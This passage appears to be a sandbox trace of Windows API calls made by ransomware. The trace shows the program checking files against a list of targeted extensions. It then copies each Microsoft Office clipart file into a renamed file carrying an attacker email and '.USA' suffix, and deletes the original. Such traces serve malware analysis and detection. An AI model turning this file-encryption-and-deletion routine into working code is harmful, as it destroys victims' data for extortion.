lstrlenW (lpString=".ppt") returned 4 [0056.354] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0056.354] lstrlenW (lpString=".zip") returned 4 [0056.354] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.354] lstrlenW (lpString=".rar") returned 4 [0056.354] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.355] lstrlenW (lpString=".bz2") returned 4 [0056.355] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.355] lstrlenW (lpString=".7z") returned 3 [0056.355] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0056.355] lstrlenW (lpString=".dbf") returned 4 [0056.355] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0056.355] lstrlenW (lpString=".1cd") returned 4 [0056.355] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0056.355] lstrlenW (lpString=".jpg") returned 4 [0056.355] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.358] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=4066) returned 1 [0056.358] CloseHandle (hObject=0x224) returned 1 [0056.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 0x20 [0056.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.359] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.359] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0056.359] GetLastError () returned 0x0 [0056.359] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xfe2, lpOverlapped=0x0) returned 1 [0056.363] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xff0, lpOverlapped=0x0) returned 1 [0056.364] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.364] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.364] SetEndOfFile (hFile=0x1c8) returned 1 [0056.364] CloseHandle (hObject=0x1c8) returned 1 [0056.364] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.364] SetEndOfFile (hFile=0x224) returned 1 [0056.365] CloseHandle (hObject=0x224) returned 1 [0056.365] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.365] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf")) returned 1 [0056.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0056.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0056.366] lstrlenW (lpString=".doc") returned 4 [0056.366] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString=".docx") returned 5 [0056.366] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.366] lstrlenW (lpString=".pdf") returned 4 [0056.366] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString=".xls") returned 4 [0056.366] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.366] lstrlenW (lpString=".xlsx") returned 5 [0056.366] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.366] lstrlenW (lpString=".ppt") returned 4 [0056.366] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0056.366] lstrlenW (lpString=".zip") returned 4 [0056.366] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.366] lstrlenW (lpString=".rar") returned 4 [0056.366] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString=".bz2") returned 4 [0056.366] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString=".7z") returned 3 [0056.366] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0056.366] lstrlenW (lpString=".dbf") returned 4 [0056.366] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0056.366] lstrlenW (lpString=".1cd") returned 4 [0056.366] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 63 [0056.366] lstrlenW (lpString=".jpg") returned 4 [0056.367] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.367] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=24320) returned 1 [0056.367] CloseHandle (hObject=0x224) returned 1 [0056.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 0x20 [0056.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.367] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.367] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0056.368] GetLastError () returned 0x0 [0056.368] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x5f00, lpOverlapped=0x0) returned 1 [0056.369] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5f10, lpOverlapped=0x0) returned 1 [0056.371] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.371] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.371] SetEndOfFile (hFile=0x1c8) returned 1 [0056.371] CloseHandle (hObject=0x1c8) returned 1 [0056.372] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.372] SetEndOfFile (hFile=0x224) returned 1 [0056.372] CloseHandle (hObject=0x224) returned 1 [0056.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.373] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 1 [0056.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0056.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0056.373] lstrlenW (lpString=".doc") returned 4 [0056.373] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.373] lstrlenW (lpString=".docx") returned 5 [0056.373] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.373] lstrlenW (lpString=".pdf") returned 4 [0056.373] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.373] lstrlenW (lpString=".xls") returned 4 [0056.373] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.373] lstrlenW (lpString=".xlsx") returned 5 [0056.373] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.373] lstrlenW (lpString=".ppt") returned 4 [0056.373] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0056.373] lstrlenW (lpString=".zip") returned 4 [0056.373] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.373] lstrlenW (lpString=".rar") returned 4 [0056.373] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.373] lstrlenW (lpString=".bz2") returned 4 [0056.374] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.374] lstrlenW (lpString=".7z") returned 3 [0056.374] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0056.374] lstrlenW (lpString=".dbf") returned 4 [0056.374] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0056.374] lstrlenW (lpString=".1cd") returned 4 [0056.374] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63 [0056.374] lstrlenW (lpString=".jpg") returned 4 [0056.374] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.374] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=24778) returned 1 [0056.374] CloseHandle (hObject=0x224) returned 1 [0056.374] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 0x20 [0056.374] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.375] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.375] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0056.375] GetLastError () returned 0x0 [0056.375] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x60ca, lpOverlapped=0x0) returned 1 [0056.377] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x60d0, lpOverlapped=0x0) returned 1 [0056.378] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.378] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.378] SetEndOfFile (hFile=0x1c8) returned 1 [0056.379] CloseHandle (hObject=0x1c8) returned 1 [0056.379] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.379] SetEndOfFile (hFile=0x224) returned 1 [0056.380] CloseHandle (hObject=0x224) returned 1 [0056.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0056.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0056.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0056.380] lstrlenW (lpString=".doc") returned 4 [0056.380] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.380] lstrlenW (lpString=".docx") returned 5 [0056.380] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.380] lstrlenW (lpString=".pdf") returned 4 [0056.380] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.380] lstrlenW (lpString=".xls") returned 4 [0056.380] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.380] lstrlenW (lpString=".xlsx") returned 5 [0056.380] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.380] lstrlenW (lpString=".ppt") returned 4 [0056.380] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0056.380] lstrlenW (lpString=".zip") returned 4 [0056.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.381] lstrlenW (lpString=".rar") returned 4 [0056.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.381] lstrlenW (lpString=".bz2") returned 4 [0056.381] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.381] lstrlenW (lpString=".7z") returned 3 [0056.381] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0056.381] lstrlenW (lpString=".dbf") returned 4 [0056.381] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0056.381] lstrlenW (lpString=".1cd") returned 4 [0056.381] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0056.381] lstrlenW (lpString=".jpg") returned 4 [0056.381] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.381] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=47996) returned 1 [0056.381] CloseHandle (hObject=0x224) returned 1 [0056.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 0x20 [0056.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.382] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.382] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0056.382] GetLastError () returned 0x0 [0056.382] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xbb7c, lpOverlapped=0x0) returned 1 [0056.384] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xbb80, lpOverlapped=0x0) returned 1 [0056.386] ReadFile (in: hFile=0x224, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.386] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.386] SetEndOfFile (hFile=0x1c8) returned 1 [0056.386] CloseHandle (hObject=0x1c8) returned 1 [0056.386] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.386] SetEndOfFile (hFile=0x224) returned 1 [0056.387] CloseHandle (hObject=0x224) returned 1 [0056.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf")) returned 1 [0056.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0056.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0056.388] lstrlenW (lpString=".doc") returned 4 [0056.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.388] lstrlenW (lpString=".docx") returned 5 [0056.388] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.388] lstrlenW (lpString=".pdf") returned 4 [0056.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.388] lstrlenW (lpString=".xls") returned 4 [0056.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.388] lstrlenW (lpString=".xlsx") returned 5 [0056.388] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.388] lstrlenW (lpString=".ppt") returned 4 [0056.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0056.388] lstrlenW (lpString=".zip") returned 4 [0056.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.388] lstrlenW (lpString=".rar") returned 4 [0056.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.388] lstrlenW (lpString=".bz2") returned 4 [0056.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.388] lstrlenW (lpString=".7z") returned 3 [0056.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0056.388] lstrlenW (lpString=".dbf") returned 4 [0056.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0056.388] lstrlenW (lpString=".1cd") returned 4 [0056.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 63 [0056.389] lstrlenW (lpString=".jpg") returned 4 [0056.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.389] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=40206) returned 1 [0056.389] CloseHandle (hObject=0x224) returned 1 [0056.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 0x20 [0056.389] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0056.389] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.389] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft 